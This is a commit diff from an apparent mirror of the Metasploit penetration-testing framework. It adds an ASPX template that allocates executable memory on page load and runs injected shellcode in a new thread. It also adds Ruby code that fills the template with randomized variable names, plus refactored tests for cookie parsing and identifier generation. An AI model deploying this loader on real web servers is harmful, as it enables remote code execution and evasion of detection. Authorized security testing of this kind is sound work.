infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master

bug/bundler_fix
Meatballs 2013-09-27 18:12:17 +01:00
parent d66269a559 7d9d98c9eb
commit 9fde8bee2b
6 changed files with 294 additions and 147 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
data/templates/scripts/to_mem.aspx.template Normal file
View File

@ -0,0 +1,21 @@
<%%@ Page Language="C#" AutoEventWireup="true" %%>
<%%@ Import Namespace="System.IO" %%>
<script runat="server">
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
protected void Page_Load(object sender, EventArgs e)
{
%{shellcode}
IntPtr %{var_funcAddr} = VirtualAlloc(IntPtr.Zero,(UIntPtr)%{var_bytearray}.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(%{var_bytearray},0,%{var_funcAddr},%{var_bytearray}.Length);
IntPtr %{var_threadId} = IntPtr.Zero;
IntPtr %{var_hThread} = CreateThread(IntPtr.Zero,UIntPtr.Zero,%{var_funcAddr},IntPtr.Zero,0,ref %{var_threadId});
}
</script>

85
lib/msf/util/exe.rb
View File

@ -13,6 +13,7 @@ class EXE
require 'rex'
require 'rex/peparsey'
require 'rex/pescan'
require 'rex/random_identifier_generator'
require 'rex/zip'
require 'metasm'
require 'digest/sha1'
@ -56,8 +57,8 @@ require 'msf/core/exe/segment_injector'
end
end
def self.read_replace_script_template(filename, hash_sub)
template_pathname = File.join(Msf::Config.install_root, "data", "templates", "scripts", filename)
def self.read_replace_script_template(filename, hash_sub)
template_pathname = File.join(Msf::Config.data_directory, "templates", "scripts", filename)
template = ''
File.open(template_pathname, "rb") do |f|
@ -822,17 +823,32 @@ def self.to_vba(framework,code,opts={})
return read_replace_script_template("to_exe.aspx.template", hash_sub)
end
def self.to_win32pe_psh_net(framework, code, opts={})
hash_sub = {}
hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_kernel32] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_baseaddr] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_threadHandle] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_output] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_temp] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_codeProvider] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
def self.to_mem_aspx(framework, code, exeopts={})
# Intialize rig and value names
rig = Rex::RandomIdentifierGenerator.new()
rig.init_var(:var_funcAddr)
rig.init_var(:var_hThread)
rig.init_var(:var_pInfo)
rig.init_var(:var_threadId)
rig.init_var(:var_bytearray)
hash_sub = rig.to_h
hash_sub[:shellcode] = Rex::Text.to_csharp(code, 100, rig[:var_bytearray])
return read_replace_script_template("to_mem.aspx.template", hash_sub)
end
def self.to_win32pe_psh_net(framework, code, opts={})
hash_sub = {}
hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_kernel32] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_baseaddr] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_threadHandle] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_output] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_temp] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_codeProvider] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
@ -1532,21 +1548,24 @@ def self.to_vba(framework,code,opts={})
output = Msf::Util::EXE.to_exe_asp(exe, exeopts)
when 'aspx'
exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
output = Msf::Util::EXE.to_exe_aspx(exe, exeopts)
output = Msf::Util::EXE.to_mem_aspx(framework, code, exeopts)
when 'dll'
output = case arch
when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts)
when ARCH_X86_64 then to_win64pe_dll(framework, code, exeopts)
when ARCH_X64 then to_win64pe_dll(framework, code, exeopts)
end
when 'exe'
output = case arch
when ARCH_X86,nil then to_win32pe(framework, code, exeopts)
when ARCH_X86_64 then to_win64pe(framework, code, exeopts)
when ARCH_X64 then to_win64pe(framework, code, exeopts)
end
when 'aspx-exe'
exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
output = Msf::Util::EXE.to_exe_aspx(exe, exeopts)
when 'dll'
output = case arch
when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts)
when ARCH_X86_64 then to_win64pe_dll(framework, code, exeopts)
when ARCH_X64 then to_win64pe_dll(framework, code, exeopts)
end
when 'exe'
output = case arch
when ARCH_X86,nil then to_win32pe(framework, code, exeopts)
when ARCH_X86_64 then to_win64pe(framework, code, exeopts)
when ARCH_X64 then to_win64pe(framework, code, exeopts)
end
when 'exe-service'
output = case arch
@ -1629,12 +1648,12 @@ def self.to_vba(framework,code,opts={})
output
end
def self.to_executable_fmt_formats
[
'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe',
'vbs','loop-vbs','asp','aspx','war','psh','psh-net'
]
end
def self.to_executable_fmt_formats
[
'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe',
'vbs','loop-vbs','asp','aspx', 'aspx-exe','war','psh','psh-net'
]
end
#
# EICAR Canary: https://www.metasploit.com/redmine/projects/framework/wiki/EICAR

26
lib/rex/random_identifier_generator.rb
View File

@ -66,15 +66,22 @@ class Rex::RandomIdentifierGenerator
#}
end
# Return a unique random identifier for +name+, generating a new one
# if necessary.
#
# @param name [Symbol] A descriptive, intention-revealing name for an
# identifier. This is what you would normally call the variable if
# you weren't generating it.
# @return [String]
def get(name)
return @value_by_name[name] if @value_by_name[name]
# Returns the @value_by_name hash
#
# @return [Hash]
def to_h
return @value_by_name
end
# Return a unique random identifier for +name+, generating a new one
# if necessary.
#
# @param name [Symbol] A descriptive, intention-revealing name for an
# identifier. This is what you would normally call the variable if
# you weren't generating it.
# @return [String]
def get(name)
return @value_by_name[name] if @value_by_name[name]
@value_by_name[name] = generate
@name_by_value[@value_by_name[name]] = name
@ -82,6 +89,7 @@ class Rex::RandomIdentifierGenerator
@value_by_name[name]
end
alias [] get
alias init_var get
# Add a new identifier. Its name will be checked for uniqueness among
# previously-generated names.

289
spec/lib/rex/proto/http/response_spec.rb
View File

@ -1,112 +1,191 @@
require 'rex/proto/http/response'
get_cookies_test_1 = '
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 12:43:12 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Fri, 26 Apr 2013 12:01:52 GMT
Vary: Accept-Encoding
Content-Length: 63951
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">'
get_cookies_test_2 = '
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 08:44:54 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
Vary: Accept-Encoding
Content-Length: 7356
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
get_cookies_test_3 = '
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 08:44:54 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
Set-Cookie: superC00kie!=stupidcookie; Path=/parp/; domain=.foo.com; HttpOnly; Expires=Wed, 13-Jan-2012 22:23:01 GMT; Secure
Vary: Accept-Encoding
Content-Length: 7356
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
get_cookies_test_4 ='
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 08:44:54 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: phpMyAdmin=; path=/phpmyadmin/; HttpOnly
Vary: Accept-Encoding
Content-Length: 7356
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
describe Rex::Proto::Http::Response do
R = Rex::Proto::Http::Response
it "get_cookies returns empty string for no Set-Cookies" do
resp = R.new()
resp.parse(get_cookies_test_1)
resp.get_cookies.should eq("")
end
it "get_cookies returns 5 cookies for test 2" do
resp = R.new()
resp.parse(get_cookies_test_2)
resp.get_cookies.split(';').count.should eq(5)
end
def get_cookies_test_no_cookies
<<-HEREDOC.gsub(/^ {6}/, '')
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 12:43:12 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Fri, 26 Apr 2013 12:01:52 GMT
Vary: Accept-Encoding
Content-Length: 63951
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
it "get_cookies returns 5 cookies for test 3 and parses full cookie" do
resp = R.new()
resp.parse(get_cookies_test_3)
resp.get_cookies.split(';').count.should eq(5)
resp.get_cookies.include?("superC00kie!=stupidcookie;").should be_true
end
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">'
HEREDOC
end
def get_cookies_test_five_cookies
<<-HEREDOC.gsub(/^ {6}/, '')
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 08:44:54 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
Vary: Accept-Encoding
Content-Length: 7356
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HEREDOC
end
def get_cookies_test_five_ordered_cookies
<<-HEREDOC.gsub(/^ {6}/, '')
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 08:44:54 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
Set-Cookie: superC00kie!=stupidcookie; Path=/parp/; domain=.foo.com; HttpOnly; Expires=Wed, 13-Jan-2012 22:23:01 GMT; Secure
Vary: Accept-Encoding
Content-Length: 7356
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HEREDOC
end
def get_cookies_test_with_empty_cookie
<<-HEREDOC.gsub(/^ {6}/, '')
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 08:44:54 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: phpMyAdmin=; path=/phpmyadmin/; HttpOnly
Vary: Accept-Encoding
Content-Length: 7356
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HEREDOC
end
def get_cookies_test_one_set_cookie_header
<<-HEREDOC.gsub(/^ {6}/, '')
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2013 20:29:23 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.9-4ubuntu2.2
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 25 Sep 2013 20:29:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpressuser_a97c5267613d6de70e821ff82dd1ab94=admin; path=/wordpress-2.0/, wordpresspass_a97c5267613d6de70e821ff82dd1ab94=c3284d0f94606de1fd2af172aba15bf3; path=/wordpress-2.0/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HEREDOC
end
def cookie_sanity_check(meth)
resp = described_class.new()
resp.parse(self.send meth)
cookies = resp.get_cookies
cookies.should_not be_nil
cookies.should_not be ''
cookies.split(';').map(&:strip)
end
context "#get_cookies" do
it 'returns empty string for no Set-Cookies' do
resp = described_class.new()
resp.parse(get_cookies_test_no_cookies)
resp.get_cookies.should eq('')
end
it 'returns 5 cookies when given 5 cookies non-sequentially' do
cookies_array = cookie_sanity_check(:get_cookies_test_five_cookies)
cookies_array.count.should eq(5)
cookies_array.should =~ %w(
pma_lang=en
pma_collation_connection=utf8_general_ci
pma_mcrypt_iv=mF1NmTE64IY%3D
phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954
phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue
)
end
it 'returns and parses 5 cookies when given 5 ordered cookies' do
cookies_array = cookie_sanity_check(:get_cookies_test_five_ordered_cookies)
cookies_array.count.should eq(5)
expected_cookies = %w{
pma_lang=en
pma_collation_connection=utf8_general_ci
pma_mcrypt_iv=mF1NmTE64IY%3D
phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954
superC00kie!=stupidcookie
}
expected_cookies.shuffle!
cookies_array.should include(*expected_cookies)
end
it 'parses an empty cookie value' do
cookies_array = cookie_sanity_check(:get_cookies_test_with_empty_cookie)
cookies_array.count.should eq(5)
expected_cookies = %w{
pma_lang=en
pma_collation_connection=utf8_general_ci
pma_mcrypt_iv=mF1NmTE64IY%3D
phpMyAdmin=
phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue
}
expected_cookies.shuffle!
cookies_array.should include(*expected_cookies)
end
it 'parses multiple cookies in one Set-Cookie header' do
cookies_array = cookie_sanity_check(:get_cookies_test_one_set_cookie_header)
cookies_array.count.should eq(2)
expected_cookies = %w{
wordpressuser_a97c5267613d6de70e821ff82dd1ab94=admin
wordpresspass_a97c5267613d6de70e821ff82dd1ab94=c3284d0f94606de1fd2af172aba15bf3
}
expected_cookies.shuffle!
cookies_array.should include(*expected_cookies)
end
end
it "get_cookies returns 5 cookies for test 4 and parses empty value" do
resp = R.new()
resp.parse(get_cookies_test_4)
resp.get_cookies.split(';').count.should eq(5)
resp.get_cookies.include?("phpMyAdmin=;").should be_true
end
end

18
spec/lib/rex/random_identifier_generator_spec.rb
View File

@ -11,6 +11,8 @@ describe Rex::RandomIdentifierGenerator do
it { should respond_to(:generate) }
it { should respond_to(:[]) }
it { should respond_to(:get) }
it { should respond_to(:store) }
it { should respond_to(:to_h) }
describe "#generate" do
it "should respect :min_length" do
@ -120,4 +122,20 @@ describe Rex::RandomIdentifierGenerator do
end
end
describe "#to_h" do
it "should return a Hash" do
rig.to_h.should be_kind_of(Hash)
end
it "should return expected key-value pairs" do
expected_keys = [:var_foo, :var_bar]
expected_keys.shuffle.each do |key|
rig.init_var(key)
end
rig.to_h.size.should eq(expected_keys.size)
rig.to_h.keys.should include(*expected_keys)
rig.to_h.values.map {|v| v.class}.uniq.should eq([String])
end
end
end

2
spec/support/shared/contexts/msf/util/exe.rb
View File

@ -24,6 +24,8 @@ shared_context 'Msf::Util::Exe' do
{ :format => "loop-vbs", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "asp", :arch => "x86", :file_fp => /ASCII/ },
{ :format => "asp", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "aspx-exe", :arch => "x86", :file_fp => /ASCII/ },
{ :format => "aspx-exe", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "aspx", :arch => "x86", :file_fp => /ASCII/ },
{ :format => "aspx", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "vba", :arch => "x86", :file_fp => /ASCII/ },